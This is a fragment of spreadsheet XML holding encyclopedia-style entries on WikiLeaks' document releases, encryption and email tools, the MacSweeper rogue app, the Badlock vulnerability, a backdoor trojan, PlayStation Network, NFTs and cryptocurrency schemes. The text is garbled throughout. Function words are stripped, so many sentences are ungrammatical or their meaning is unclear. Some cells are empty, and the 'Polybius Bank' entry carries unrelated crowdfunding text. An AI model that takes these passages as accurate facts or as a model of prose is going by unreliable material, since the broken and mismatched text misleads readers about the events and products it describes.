whistleblowers. reasons report include notable leaks u.s. equipment expenditure, human rights violations guantanamo bay, battle iraqi town fallujah. baghdad airstrike video april 2010, wikileaks released classified u.s. military footage series attacks july 2007 baghdad u.s. helicopter killed 12–18 people, including reuters news staff, saeed chmagh namir noor-eldeen, website called "collateral murder". attack also wounded others including children fired came collect wounded men. footage consisted 39-minute unedited version 18-minute version edited annotated. according media reports, reuters news staff company armed pilots thought chmagh noor-eldeen carrying weapons (which actually camera equipment). footage includes audio american pilots shooting. after wounding children pilot says "well, it’s fault bringing kids battle". military conducted investigation incident found rocket propelled grenade launchers ak-47 among dead.in week following release, "wikileaks" search term significant growth worldwide last seven days measured google insights. afghan diary july 2010, wikileaks released guardian, york times, spiegel 92,000 documents related afghanistan 2004 2009. documents detail individual incidents including friendly fire civilian casualties. scale leak described julian assange comparable pentagon papers 1970s. documents released public july 2010. july 2010 wikileaks added "insurance file" afghan diary page, whose decryption details would released wikileaks assange harmed.about 15,000 92,000 documents released wikileaks, group currently reviewing documents remove sources information. speaking group london august 2010, assange said group "absolutely" release remaining documents. stated wikileaks requested help pentagon human-rights groups help redact names, received assistance. also stated wikileaks "not obligated protect people's sources...unless unjust retribution."according report daily beast website, obama administration asked britain, germany australia among others consider bringing criminal charges assange afghan leaks help limit assange's travels across international borders. united states, joint investigation army federal bureau investigation prosecute "mr. assange others involved grounds encouraged theft government property".the australia defence association (ada) stated wikileaks' julian assange "could committed serious criminal offence helping enemy australian defence force (adf)." neil james, executive director ada, states: "put bluntly, wikileaks authorised international australian law, equipped morally operationally, judge whether open publication material risks safety, security, morale legitimate objectives australian allied troops fighting un-endorsed military operation."wikileaks' recent leaking classified u.s. intelligence described commentator wall street journal "endangered lives afghan informants" "the dozens afghan civilians named document dump u.s. military informants. their lives, well entire families, terrible risk taliban reprisal." when interviewed, assange stated wikileaks withheld 15,000 documents identify informants avoid putting lives risk. specifically, voice america reported august 2010 assange, responding criticisms, stated 15,000 still held documents reviewed "line line," names "innocent parties reasonable threat" removed. greg gutfeld news described leaking "wikileaks' crusade against u.s. military." john pilger reported prior release afghan diaries july, wikileaks contacted white house writing, asking identify names might draw reprisals, received response.according york times, amnesty international reporters without borders criticized wikileaks risking people's lives identifying afghans acting informers. taliban spokesman said taliban formed nine-member "commission" review documents find people spying." said taliban "wanted" list 1,800 afghans comparing names wikileaks provided, stating "after process completed, taliban court decide people." love parade documents following love parade stampede duisburg, germany july 2010, local news blog xtranews published internal documents city administration regarding love parade planning actions authorities. city government reacted acquiring court order august forcing xtranews remove documents blog. days later, however, documents surfaced websites well, government stated would conduct legal actions publication documents. august wikileaks released publication titled loveparade 2010 duisburg planning documents, 2007–2010, comprised internal documents regarding love parade 2010. iraq logs october 2010, reported wikileaks planning release 400,000 documents relating iraq war. julian assange initially denied reports, stating: "wikileaks speak upcoming releases dates, indeed, rare exceptions communicate specific information upcoming releases, since simply provides fodder abusive organizations spin machines ready." guardian reported october 2010 received almost 400,000 iraq documents wikileaks. october 2010, jazeera first release analyses leak, dubbed logs. wikileaks posted tweet jazeera broken embargo minutes. release everyone iraq logs embargoes." this prompted news organizations release articles based source material. release documents coincided return main wikileaks.org website, offering content since september 2010. quoted pentagon referring iraq logs "the largest leak classified documents history." media coverage leaked documents focused claims u.s. government ignored reports torture iraqi authorities 2003 war. state department diplomatic cables release november 2010 announcement made wikileaks twitter feed next release would size iraq logs." u.s. authorities media speculated contained diplomatic cables. prior expected leak, government united kingdom (uk) sent da-notice newspapers, requests advance notice newspapers regarding expected publication. according index censorship, "there obligation media comply". "newspaper editors would speak [the] defence, press broadcasting advisory committee prior publication." pakistani newspaper dawn stated u.s. newspapers york times washington post expected publish parts diplomatic cables sunday november, including pakistan-related documents.on november, lawyer jennifer robinson, assange sent letter department state, asking information regarding people could placed "significant risk harm" diplomatic cables release. harold koh, legal adviser department state, refused proposal, stating, engage negotiation regarding release dissemination illegally obtained u.s. government classified materials."on november, wikileaks announced undergoing massive distributed denial-of-service attack, vowed still leak cables documents prominent media outlets including país, monde, spiegel, guardian, york times. announcement shortly thereafter followed online publication, guardian, purported diplomatic cables, including united states secretary state hillary clinton apparently orders diplomats obtain credit card frequent flier numbers french, british, russian chinese delegations united nations security council. other revelations reportedly include several arab nations urged u.s. launch first strike iran, chinese government directly involved computer hacking, u.s. pressuring pakistan turn nuclear material prevent falling wrong hands. cables also include unflattering appraisals world leaders.in december 2010, spiegel reported cables showed placed pressure germany pursue suspected agents involved 2003 abduction khalid el-masri, german citizen. abduction probably carried "extraordinary rendition". german prosecutors munich issued arrest warrants suspected operatives involved abduction. cables released wikileaks showed contact then-deputy ambassador john koenig diplomats munich public prosecutor's office germany's justice ministry foreign ministry cooperated agents extradited germany.despite steps taken united states government forbidding unauthorized federal government employees contractors accessing classified documents publicly available wikileaks, week following release november december 2010), "wikileaks" remained search term united states measured google insights.u.s. secretary state hillary clinton responded leaks saying, "this disclosure attack america's foreign policy; attack international community, alliances partnerships, conventions negotiations safeguard global security advance economic prosperity." julian assange quoted saying, course, abusive, titanic organizations, exposed, grasp sorts ridiculous straws distract public true nature abuse." john perry barlow, co-founder electronic frontier foundation, wrote tweet saying: "the first serious infowar engaged. field battle wikileaks. troops." 2011 guantanamo files april 2011 wikileaks began month-long release department defense documents detainees guantanamo detention camp. files december 2011 wikileaks started release files. 2012 global intelligence files february 2012, wikileaks began publish called "the global intelligence files", 5,000,000 e-mails stratfor dating july 2004 late december 2011. said show private intelligence agency operates targets individuals corporate government clients. days before, february, wikileaks released second insurance file bittorrent. file named "wikileaks-insurance-20120222.tar.bz2.aes" size. syria files july 2012, wikileaks began publishing syria files, million emails syrian political figures, ministries associated companies, dating august 2006 march 2012. 2013 plusd april 2013, wikileaks releases million u.s. diplomatic intelligence reports including kissinger cables. cables previously declassified released national archives records administration. prosecution prison documents anakata released 2013. files september 2013, wikileaks released 'spy files documents global intelligence contractors. files showed spyware exported countries across world, including dictators. draft trans-pacific partnership agreement charter draft text trans-pacific partnership agreement intellectual property charter. 2014 trade services agreement chapter draft wikileaks published secret draft financial services annex trade services agreement june 2014. website, organization provided analysis leaked document. tisa, international trade deal aimed market liberalization, covers countries global services industry. agreement's negotiations criticized lack transparency. australian bribery case suppression order july 2014, wikileaks released secret gagging order issued supreme court victoria forbid australian press coverage multimillion-dollar bribery investigation involving nation's central bank several international leaders. indonesian, vietnamese, malaysian australian government officials named order, suppressed "prevent damage australia's international relations caused publication material damage reputations specified individuals subject charges proceedings."public criticism suppression order followed leak. human rights watch general counsel dinah pokempner, said "secret often unaccountable inadequately justified. government explaining sought extraordinary order, court reconsider need action come light." media conference, indonesian president susilo bambang yudhoyono condemned gagging order, calling open transparent investigation. 2015 investment chapter march 2015 wikileaks released "investment chapter" secret negotiations (trans-pacific partnership) agreement, controversial parts deal. before leak, provisions kept secret order allow negotiations smoothly. opponents transparency proponents argued secrecy lets governments push things constituents like. sony archives april 2015, wikileaks published searchable version sony archives originally obtained november 2014 hacker group "guardians peace". leak contained 30,287 documents sony pictures entertainment (spe) 173,132 emails 2,200 email addresses. subsidiary japanese multinational technology media corporation sony, handles film production distribution operations. trident nuclear weapons system whistle blower, royal navy able seaman william mcneilly exposed serious security issues relate uk's nuclear weapons system. saudi cables june 2015 wikileaks began publishing confidential secret saudi arabian government documents.cables early 2013 indicate british government david cameron traded votes saudi arabia support other's election united nations human rights council (unhrc) period 2014–2016. both britain saudi arabia joined unhrc election held 2013. watch expressed concern report saying unhrc must chosen based upholding highest standards human rights. 2016 email leak july 2016, wikileaks released nearly 20,000 e-mails 8,000 attachments democratic national committee (dnc), governing body u.s. democratic party. leak includes emails seven staff members, date january 2015 2016. collection emails allegedly disclose bias staffers presidential campaign senator bernie sanders favor hillary clinton's campaign. wikileaks reveal source. mueller investigation indicted russian intelligence officers hacking leaking emails. podesta emails october 2016, wikileaks started releasing emails john podesta, chairman hillary clinton's 2016 presidential campaign. emails provide insight inner workings clinton's campaign. emails contained excerpts clinton's paid wall street speeches. another leaked document included eighty pages clinton's wall street speeches. also among emails email donna brazile podesta suggested brazile received town hall debate question advance sharing clinton. emails released october 2016 included podesta's icloud account password. icloud account reportedly hacked, twitter account briefly compromised. some emails revealed emails barack obama podesta exchanged 2008.the clinton campaign declined authenticate leaks. glen caplin, spokesman clinton campaign, said, dribbling every wikileaks proving nothing propaganda kremlin political agenda [vladimir] putin's dirty work help elect donald trump." york times reported asked, president vladimir putin replied russia falsely accused. julian assange also denied russia source. mueller investigation indicted russian intelligence officers hacking leaking emails. yemen files november 2016, wikileaks released emails internal documents provided details military operations yemen 2009 march 2015. plusd november 2016, wikileaks released 500,000 diplomatic cables sent united states department state 1979 presidency jimmy carter. cables previously declassified released national archives records administration. german bnd-nsa inquiry december 2016, wikileaks released 2,420 documents claims german parliamentary committee investigating spying scandal. german security officials first suspected documents obtained 2015 cyberattack bundestag, suspect internal leak. turkish party emails turkey blocked access wikileaks website released emails turkey's ruling justice development party, akp, response erdoğan’s post-coup purges political dissent. source information accused wikileaks lying contents emails publishing without sources permission. 2017 espionage orders february 2017, wikileaks released purported report espionage orders (marked noforn) 2012 french presidential election. order called details party funding, internal rivalries future attitudes toward united states. associated press noted "the orders seemed represent standard intelligence-gathering." vault march 2017, wikileaks published 8,000 documents cia. confidential documents, codenamed vault dated 2013 2016, included details cia's software capabilities, ability compromise cars, smart tvs, browsers (including google chrome, microsoft edge, firefox, opera), operating systems smartphones (including apple's google's android), well operating systems microsoft windows, macos, linux. july 2022, joshua schulte convicted sending information wikileaks. files russia september 2017, wikileaks released "spy files russia," revealing "how saint petersburg-based technology company called peter-service helped state entities gather detailed data russian mobile phone users, part national system online surveillance called system operative investigative activities (sorm)." 2018 patrol june 2018, wikileaks published documents containing personal details many u.s. immigration customs enforcement (ice) employees scraped linkedin declared "increasing accountability, especially light extreme actions taken lately, separation children parents border". allegation corrupted broker france-uae arms deal september 2018, wikileaks published information related dispute commission payment arms deal french state-owned company giat industries (now nexter systems) united arab emirates (uae). deal, signed 1993 completion 2008, involved sale nexter armoured vehicles, leclerc combat tanks, training tanks, spare parts ammunition. dispute brought international chamber commerce (icc) abbas ibrahim yousef yousef, acted broker nexter systems. yousef claimed paid million less $235 million promised nexter. nexter justified stopping payments saying yousef's company, kenoza consulting management, inc., registered british virgin islands, committed corrupt acts among things, using german engines tanks, violated laws forbidding arms sales germany middle east. yousef claimed obtained waiver laws using lobby groups contact "decision makers highest levels, france germany". yousef's claims nexter systems dismissed became known charge deal would much less paid retainer. 2019 organisation prohibition chemical weapons between october december 2019, wikileaks published four batches internal documents organisation prohibition chemical weapons related investigation alleged chemical attack douma april 2018. 2021 intolerance network 2021, wikileaks published 17,000 documents right-wing groups hazteoir citizengo. complete list this article covers small subset leaked documents—those attracted significant attention mainstream press. wikileaks complete list, organised country year 2010. unpublished material october 2009 computer world published interview assange claimed possession "5gb bank america" "one executive's hard drives." november 2010 forbes magazine published another interview assange said wikileaks planning another "megaleak" early 2011, time would inside private sector involve u.s. bank". bank america's stock price fell three percent following announcement. assange commented possible impact release could take bank two." however, wikileaks claims information among documents former spokesperson daniel domscheit-berg claimed destroyed august 2011. march 2010, daniel domscheit-berg, time wikileaks' spokesperson, announced podcast organization possession around 37,000 internal e-mails far-right national democratic party germany. stated explicitly working project would make legally vulnerable german citizen. according him, wikileaks working crowd sourcing-based tool exploit masses data. wikileaks claimed e-mails (which claimed numbered 60,000) among documents domscheit-berg claimed destroyed august 2011. 2010, wikileaks said video footage alleged massacre afghan civilians u.s. military, said preparing release. however, among videos wikileaks reported former spokesperson domscheit-berg destroyed august 2011. july 2010 interview chris anderson, assange showed document wikileaks albanian well blowout, said also material inside "getting [an] enormous quantity whistle-blower disclosures high caliber" added wikileaks able verify release material enough volunteer journalists. september 2010 twitter post, wikileaks stated first-edition copy operation dark heart, memoir u.s. army intelligence officer. uncensored first printing around 9,500 copies purchased destroyed u.s. department defense entirety. october 2010, assange told leading moscow newspaper "[t]h</t>
  </si>
  <si>
    <t>Pretty Easy privacy</t>
  </si>
  <si>
    <t>pretty easy privacy (p≡p pep) pluggable data encryption verification system, provides automatic cryptographic management libraries (providing adapters application developers' used programming languages development environments) written digital communications. main goal make end-to-end encryption default written digital communications users easiest possible channels already make including e-mails, sms, types messages. exists plugin microsoft outlook mozilla thunderbird well mobile android ios. also works microsoft windows, unix-like and, operating systems. cryptographic functionality handled open-source engine relying already existing cryptographic implementations software like gnupg, modified version netpgp (used ios), v2.0) gnunet. default configuration, rely trust form centralized trust infrastructure, instead lets users verify other's authenticity comparing cryptographic fingerprints form natural language strings, developers chosen call "trustwords". pretty easy privacy first released 2016. software already released, including engine, adapters, apps add-ons (including microsoft outlook), free open-source software. march 2021, revealed company behind paid fake reviews apps. design principles above all, supposedly contrary existing cryptographic solutions easy install, understand. furthermore, communications, users depend specific platform, message transport system (sms, email, xmpp, etc.), centrally provided client–server "cloud" infrastructures: fully peer-to-peer design.keys exchanged opportunistically transferring email. enigmail support enigmail announced support "pretty easy privacy" (p≡p) encryption scheme joint thunderbird extension released december 2015. patrick brunschwig, head enigmail, announced core functionality implemented enigmail october 2016, ready mozilla festival taking place london.in july 2020, thunderbird dropped support enigmail add-on. thunderbird includes openpgp functionality, longer requires installation external software. isoc support internet society switzerland chapter (isoc-ch) swiss foundation teamed provide practical solution, namely implement privacy-enhancing standards basic level internet protocols document work internet engineering task force (ietf), main organization creating voluntary standards maintain improve usability interoperability internet. also privacy guard pretty good privacy references external links official website official foundation website official manual</t>
  </si>
  <si>
    <t>Macaroons (computer science)</t>
  </si>
  <si>
    <t>computer security, macaroons authorization credentials support decentralized delegation principals.macaroons used variety systems, including ubuntu snappy package manager, hyperdex data store, matrix communication protocol, python package index. claims macaroon composed series "caveats", example: upload files /user/a/ (issued server) /user/a/album/123 (derived gifs, (derived noon today (derived c)the macaroon model specify language caveats; original paper proposes model subjects rights, details left individual implementations. related technologies macaroons similar technologies. compared json token (jwt): holder macaroon issue sub-macaroon smaller power, fixed macaroon notably longer macaroon equivalent signed jwt, offer equivalent encrypted jwtcompared certificates macaroons based symmetric model, certificates asymmetric macaroons computationally cheaper require simpler cryptographic primitives using macaroon (sent server) disclose private information held macaroon holder, meaning server must trusted; using certificate means signing payload using private key, sent server, thus communication untrusted servers less risky. invalidation implementations need decide whether entire macaroon tree invalidated root, server secret key; intermediate macaroons blacklisted, comparable time-bound jwt's. also authorization http cookie oauth openid simple public-key infrastructure references</t>
  </si>
  <si>
    <t>List of most expensive non-fungible tokens</t>
  </si>
  <si>
    <t>this list highest known prices possibly paid non-fungible tokens (nfts) representing digital assets. background monetization digital assets nfts became possible release etheria, ethereum blockchain, 2015. after gaining traction late 2017, market grew quickly 2020. this continued 2021, leading massive buying surge, $200 million worth nfts traded first three months alone.one earliest projects, cryptopunks, released larvalabs ethereum blockchain, provided several expensive nfts. there nft-like projects "proto nfts" pre-date cryptopunks; rare pepes, example, released counterparty 2014. list artists sales volume this list based volume total potential sales across platforms including nifty gateway, superrare, foundation, nunc, makersplace, knownorigin, artblocks async art. total artwork value based artist's market capitalization, artist's total sales value.* list highest prices paid this list ordered consumer price index inflation-adjusted value bold) millions united states dollars 2021. where necessary, price first converted dollars using exchange rate time sold. inflation adjustment change, recent inflation rates often revised. list another currency slightly different order exchange-rate fluctuations. nfts listed once, i.e. highest price sold. maintain manageable size, nfts sold adjusted price million listed below. also list expensive artworks living artists list expensive paintings list expensive photographs list expensive sculptures list expensive books manuscripts notes references</t>
  </si>
  <si>
    <t>MacSweeper</t>
  </si>
  <si>
    <t>macsweeper rogue application misleads users exaggerating reports spyware, adware viruses computer. first known "rogue" application operating system. software discovered f-secure, finland-based computer security software company, january 2008.as 2009, official website application, macsweeper.com, shut down, website kivvi software shortly after. problems caused macsweeper macsweeper could downloaded kivvi software's (the company makes "rogue") website, drive-by download, silently downloaded another application. once automatically installed, macsweeper scans computer informs user many applications computer (such ical dashboard, safe pre-installed apple applications) "fat binaries trash" must slimmed immediately. when unsuspecting user tries "remove objects", told trial version downloaded cannot delete supposed trash. then user must provide credit card details company $39.99 "lifetime subscription serial key". clones macsweeper's graphical user interface behaviour almost identical another program published kivvi software, cleanator. cleanator, however designed windows operating systems. also similar spysheriff spyaxe applications, infamous typosquatting google. paragraph within software encourages users purchase full version identical spysheriff. removal companies including mcafee, symantec sunbelt software identified threat posted removal instructions websites. intego virusbarrier iantivirus capable removing too. siteadvisor, division mcafee controversially given site green rating. however, siteadvisor's tests conducted pcs, cannot recognise .dmg, file format macsweeper. media attention macsweeper received much media attention websites including cnet well others, considered first instances malware designed operating system. macsweeper's response after f-secure alerted macintosh users rogue, macsweeper responded f-secure's website, saying would like explain situation, macsweeper. really trying make good software, wont find viruses/spyware/trojans/malware macsweeper (test self, believe type firewalls, dissemblers, tools) problem using selling partners forces marketing type. would like leave them, want completely destroy good name macsweeper application. personally adore platform, hurts hear program wrote said kind "rogue application" like destroy good manners software written would like sorry inconveniences could bring you, believe macsweeper meant useful application. questions, answer them! thank you! references http://blog.intego.com/index.php?s=macsweeper also computer security</t>
  </si>
  <si>
    <t>Badlock</t>
  </si>
  <si>
    <t>badlock (cve-2016-2118) security disclosed april 2016 affecting security account manager (sam) local security authority (domain policy) (lsad) remote protocols supported windows samba servers.both lsad layered onto remote procedure call (dce/rpc) protocol. implemented samba windows, services allowed attacker become middle. although vulnerability discovered development samba, namegiving protocol affected. references external links badlock wayback machine (archived 2017-06-08)</t>
  </si>
  <si>
    <t>Polygon (blockchain)</t>
  </si>
  <si>
    <t>polygon (formerly matic network) indian blockchain scalability platform. addresses challenges faced ethereum high fees, poor user experience, transaction count second. aims create multi-chain blockchain ecosystem compatible ethereum.polygon involved defi, dapps (decentralized applications), daos nfts. history “matic network” project initiated four software engineers—jaynti kanani, sandeep nailwal, anurag arjun, mihailo bjelic—who founded mumbai-based startup. december 2019, matic token experienced sudden decline prompted binance boss changpeng zhao post twitter reassure platform users. february 2021, project changes name, scope expanded extended metaverse.in december 2021, polygon acquired startup predicate labs, developed blockchain order access technology called “zero-knowledge rollups”, offloads data ethereum reduce fees speed transaction process.in february 2022, polygon raised $450 million selling matic tokens sequoia capital india investors.in april 2022, financial solutions company stripe chose polygon cryptocurrency payments “low fees, speed, integration ethereum, compatibility many wallets”. twitter first beneficiary service powered polygon.in july 2022, polygon selected participate disney's 2022 acceleration program expand augmented reality, nfts, experiences. this program designed encourage growth innovative companies. references</t>
  </si>
  <si>
    <t>MacScan</t>
  </si>
  <si>
    <t>macscan anti-malware software macos developed securemac. features securemac runs apple macos. scans removes malware (including spyware, trojan horses, keystroke loggers, tracking cookies). also scans remote administration programs, like apple remote desktop, allowing users verify programs installed authorization. full version available shareware. unlike anti-malware applications available (and systems), macscan scans exclusively malware affects macs, opposed scanning forms known threats, would include windows malware. given considerably less macos malware windows-based malware, macscan's definition files smaller optimized. also list macintosh software references external links 'review: macscan macworld, 2016 'review: macscan 2.9.4', cnet editor review, february 2013 'review: macscan 2.6', softpedia, february 2009 'review: macscan 2.6', brighthub, january 2009 macworld apps business', money, january 2009 'review: macscan 2.1', macworld, july 2006 'review: macscan 2.5', laptop magazine, april 2008 'review macscan macworld 2008 'macscan your trojan lesson', apple matters, april 2006</t>
  </si>
  <si>
    <t>Polybius Bank</t>
  </si>
  <si>
    <t>this incomplete list highest-funded crowdfunding projects (including projects failed achieve funding). over million 10-50 million 5–10 million million also list highest-funded equity crowdfunding projects kickstarter#top projects funds raised indiegogo#top projects funds raised list video game crowdfunding projects references</t>
  </si>
  <si>
    <t>Mailpile</t>
  </si>
  <si>
    <t>mailpile free open-source email client main focus privacy usability. webmail client, albeit user's computer, downloaded program launched local website. features default setup program, user given public private key, purpose (respectively) receiving encrypted email decrypting mailpile uses stores locally generated files encrypted form on-disk. client takes opportunistic approach finding users encrypt support integrates process sending email. program preloads email data accelerate search results. while search results remain really fast despite large amounts emails, gradually slows start-up time program stored email data increases. this feature likely altered planned mailpile version history mailpile started search engine 2011.[1] crowdfunding project gained recognition following indiegogo crowdfunding campaign, raising $163,192 august september 2013. middle campaign, paypal froze large portion raised funds, subsequently released mailpile took issue public blogs social media platforms including twitter. releases alpha first publicly tagged release 0.1.0 january 2014 included original typeface (also name "mailpile"), feedback encryption signatures, custom search engine, integrated spam-filtering support, localization around languages. alpha july 2014 this release introduced storing logs encrypted, partial native imap support, spam filtering engine gained ways auto-classify e-mail. graphical interface revamped. wizard introduced help users account setup. beta mailpile released beta version september 2014. beta january 2015 1024 keys longer generated, favour stronger, 4096 keys. beta july 2015 release candidate preliminary version version released august dutch sha2017 hacker camp, main developer gave talk project. notes references external links official website</t>
  </si>
  <si>
    <t>Mailwasher</t>
  </si>
  <si>
    <t>mailwasher email filtering software windows detect delete spam user's email mail server, downloaded user's computer. mailwasher developed zealand based company firetrust. uses combination user defined filters, spam databases bayesian filtering. filter works small portion email, allows unwanted emails directly deleted user's pop3 inbox, without downloading email client user's computer. this approach intended prevent downloading spam messages infected malware. there versions program. free version access single mail account contain bayesian learning filter. version access multiple accounts additional features. references article mailwasher free world article mailwasher world external links mailwasher (free version) mailwasher official user assistance forum</t>
  </si>
  <si>
    <t>Backdoor.Win32.Seed</t>
  </si>
  <si>
    <t>backdoor.win32.seed definition backdoor trojan. first known detection goes back february 7th, 2005, according securelist (kaspersky labs). meanwhile, several variants malware, self-replicate (non-a.i.). backdoor.win32.seed spread manually, often premise .exe file something beneficial. distribution channels include irc, peer-to-peer networks, newsgroup postings e-mails. other aliases rdn/generic backdoor (mcafee) backdoor.seed (vba32) bck/small.eo (panda labs) external links analysis file virustotal analysis file threat expert references</t>
  </si>
  <si>
    <t>PlayStation Network ID</t>
  </si>
  <si>
    <t>playstation network (psn) digital media entertainment service provided sony interactive entertainment. launched november 2006, originally conceived playstation video game consoles, soon extended encompass smartphones, tablets, blu-ray players high-definition televisions. this service account playstation consoles, accounts store games content. april 2016, million users documented, million active monthly march 2022. playstation network's services dedicated online marketplace (playstation store), premium subscription service enhanced gaming social features (playstation plus), music streaming (playstation music, based spotify) formerly cloud gaming service (playstation now; folded playstation plus premium june 2022). service available territories. history launched year 2000, sony's second home console, playstation rudimentary online features select games online network. required network adaptor, available add-on original models integrated hardware slimline models. however, sony provided unified service system, support network features specific game third-party server, interoperability cross-game presence. five years later development stage third home console, playstation sony expressed intent build upon functionality predecessor creating interconnected service keeps users constantly touch "playstation world" network. march 2006, sony officially introduced unified online service, tentatively named "playstation network platform". list supporting features announced tokyo game show later year.sony launched optional premium subscription service free service june 2010. known playstation plus, system provides access exclusive content, complementary games, regular store discounts, early access forthcoming games. following security intrusion, playstation network temporary suspension operation began april 2011 affected million registered accounts. lasting days, outage longest amount time offline since inception 2006. sony reported user data obtained intrusion. june 2011, sony launched "welcome back" program following outage, allowing subscribers joined prior april download free playstation titles free playstation portable games. users also received free days playstation plus, users already subscribed outage free days. after disruption, sony changed playstation network's license agreement legally users filing lawsuits joining class action lawsuits without first trying resolve issues arbitrator.in july 2012, sony computer entertainment announced acquired video game streaming service gaikai $380 million. acquisition later strengthened sony acquired assets gaikai's market rival onlive. consumer electronics show january 2014, sony announced gaikai's technology would used power playstation now; cloud-based gaming service allows people play playstation games variety devices. during 2014, sony rolled service north america playstation playstation beta form means users test performance pricing structures.on december 2014, playstation network xbox live suffered network disruption denial-of-service attack. both services flooded millions inauthentic connection requests, making hard genuine users establish connection. functionality restored december users experiencing difficulties days followed. january 2015, sony announced users would compensated downtime five-day extension playstation plus memberships.formerly gaming provision much broader sony entertainment network, playstation network became sony's premier entertainment service 2015, unifying games, music, television video. while synonymous gaming, sony said playstation network evolved become "comprehensive digital entertainment brand". name still used places. user information signing playstation network free. types accounts created: master accounts accounts. master account allows full access settings, including parental controls. accounts subsequently created (e.g. children) desired restrictions master account holder. account holder option upgrade account reach years age. sony encourage registrants unique email strong password associated online services. online online one's username playstation network. range characters length consist letters, numbers, hyphens underscores. user's online central profile displayed playing online games using network features. april 2019, sony enabled users change online id.users option disclose real name aside online personal description, exhibit profile picture avatar, list spoken languages. profiles also include summary player's trophy level recent activity. profiles viewed user interface online playstation website. portable small infographic intended forum signature. graphic showcases user's trophy level number trophies awarded. each user able account using browser access customize portable given unique paste display elsewhere internet. several third-party websites offer similar graphics free paid services either update automatically updated manually user. trophies trophies in-game awards presented gamers hitting specific targets reaching certain milestones, completing difficult level defeating certain number enemies. there four different types trophy awarded: bronze, silver, gold trophy contingent upon difficulty accomplishment, reward contributing level system attached player's profile. platinum trophy awarded player unlock trophies base game; smaller sized games, however, generally offer platinum trophy. addition, trophy graded popularity—common, rare, rare, ultra rare—based percentage people unlocked developers choose make various trophies hidden value description revealed user obtained them.in effort discourage cheating terms soon trophies awarded, playstation network requires consoles maintain accurate time date setting digitally downloaded game started, also extends virtually physically released software certain physical games ps5. without connection playstation network, consoles would rely cmos battery maintain date time. console unable obtain accurate date time playstation network loss connectivity cmos battery charge combined, games rendered unplayable leading critics decry anti-cheat system form always-on threat video game preservation upon discovery issue, known c-bomb, several months playstation launch, sony contemplating equally controversial decision shut playstation store previously discontinued systems used late september 2021, sony resolved c-bomb issue firmware update 9.0.0, inability obtain accurate date time would disable time-stamping trophies instead blocking startup games. sony later resolved issue playstation november, allowing physical digital games without need accurate date time reading psn, except playstation plus games, require online verification access them. playstation plus playstation plus plus) paid tiered subscription service provides users access premium features. these features include access online multiplayer, exclusive discounts playstation store, ability upload saved game files playstation servers, games available download month additional cost. these features available subscribers, included even base "essential" tier. "extra" tier provides access wide catalogue playstation games, "premium" tier adds access downloadable playstation 1/2/portable games, access limited trials select games, regions) ability cloud stream certain playstation1/2/portable/4 games. tiers subscription, users choose monthly, quarterly, annual payment. monthly games membership includes access rolling selection games titles announced every month, downloaded immediately added library later access, replaced selection games. members keep games library long remain member playstation plus. membership lapses, games become inaccessible. once membership renewed, games become unlocked again. late june 2020, announced plus expand capacity accessible games three 10th anniversary. playstation plus collection september 2020, sony announced next-generation showcase playstation plus members purchase playstation would also access collection "generation defining" games playstation playstation plus collection includes: 2022 revamp december 2021, bloomberg reported sony working subscription service codenamed "spartacus" would merger company’s current services, playstation plus playstation now, company reportedly keep plus branding. service reported including three tiers, first including benefits playstation plus, second expanding upon first including catalog playstation playstation titles, third expanding upon first including demos well catalog games playstation, playstation playstation playstation portable. bloomberg claimed service would launch within spring 2022 compete microsoft’s xbox game pass service.the revamped playstation plus service three-tier subscription model officially confirmed sony march 2022 launching june 2022; service launched first asian territories excluding japan 2022, japan june 2022, north america june 2022, europe june 2022. existing service became playstation plus essential, playstation plus extra additionally gives user access games downloadable streamable titles, playstation plus premium adds access streaming games playstation, ps2, ps3, download games. markets without now, sony offers alternate version premium called playstation plus deluxe includes benefits premium discounted rate without cloud streaming. playstation store playstation store digital media shop offers range downloadable content purchase available free charge. this includes full games, free-to-play games, add-ons, demos, music, movies background themes. store accepts physical currency, paypal transfers prepaid network cards.playstation network cards form electronic money used playstation store. each card contains alphanumeric code entered playstation network deposit credit virtual wallet. sony devised payment method people without access credit card, playstation owners would like send receive cards gifts. tickets available online retailers, convenience stores, electronic kiosks post office atms. 2012 sony introduced cross-buy initiative whereby game available multiple playstation devices need purchased once. players download playstation version game transfer playstation vita playstation version extra cost, vice versa. users immediate access supported titles digital game library, even upgrade newest system. initiative later extended include playstation playstation blog playstation blog online playstation focused gaming blog part playstation network. launched june 2007, regular content includes game announcements, developer interviews store updates. sub-site blog called playstation.blog share launched march 2010 allows users submit ideas playstation team anything playstation-related well vote ideas submissions. original programming beginning spring 2015, playstation network begin produce distribute original content. first original scripted program, powers, premiered march 2015 full seasons. series cancelled august 2016.in june 2017, announced sony launching emerging filmmakers program members public submit pitches potential television series aired playstation network. submissions august 2017 five ideas would turned pilot episodes voted playstation community. also list playstation applications nintendo switch online xbox network notes references external links official website</t>
  </si>
  <si>
    <t>Local currency</t>
  </si>
  <si>
    <t>Pleasant Password Server</t>
  </si>
  <si>
    <t>pleasant password server proprietary, multi-user enterprise password server fully compatible modified version keepass password safe. designed business users, password server provides access provisioning well per-group per-entry access restrictions. pleasant password server supports secure passwords, allowing system administrators manage user passwords central interface.the password software extends desktop mobile environments, tested compatibility chrome, firefox, internet explorer, opera, android devices, devices well browsers. developed pleasant solutions inc., product pricing based upon number software users licensed product, length product support well product upgrades. features pleasant password server standard edition forms core product built versions. standard server stores user passwords login information using secure database managed internally company. versions software maintain core feature set, including: single password: user names, passwords website information secured single master password unique user. keepass compatibility: support keepass plug-ins. client permits user access outside company intranet, using operating system. multiple language extensions: language translations available download. automatic clipboard erase random password generator work teams. ability disable users left company, freezing credential access.pleasant password server enterprise edition includes additional features, primarily: active directory/ldap integration: import, export synchronization existing ldap databases. customize modify access permissions granted user role. view access permissions granted user role. logging passwords accessed, export .csv file.pleasant solutions inc. also developed password proxy module prevents credentials stored user devices, shielding enterprise passwords users. also comparison password managers list password managers password manager cryptography encryption references external links official website pleasant password server change</t>
  </si>
  <si>
    <t>PlusToken</t>
  </si>
  <si>
    <t>plustoken ponzi scheme mainly investors china south korea. history plustoken started april 2018. offered monthly payments users cryptocurrency wallet. there also token called plus associated total amount cryptocurrency taken plustoken estimated worth (based 2019 prices) us$2.9 billion. selling cryptocurrencies plustoken speculated cause price drops bitcoin.in june 2019, chinese nationals associated scheme arrested vanuatu deported could face trial china.in july 2020, china's ministry public security announced "major criminal suspects" "key" members plustoken arrested.in november 2020, court jiangsu sentenced ringleaders behind scheme eleven years prison. also bitconnect onecoin tech references</t>
  </si>
  <si>
    <t>Mark Karpelès</t>
  </si>
  <si>
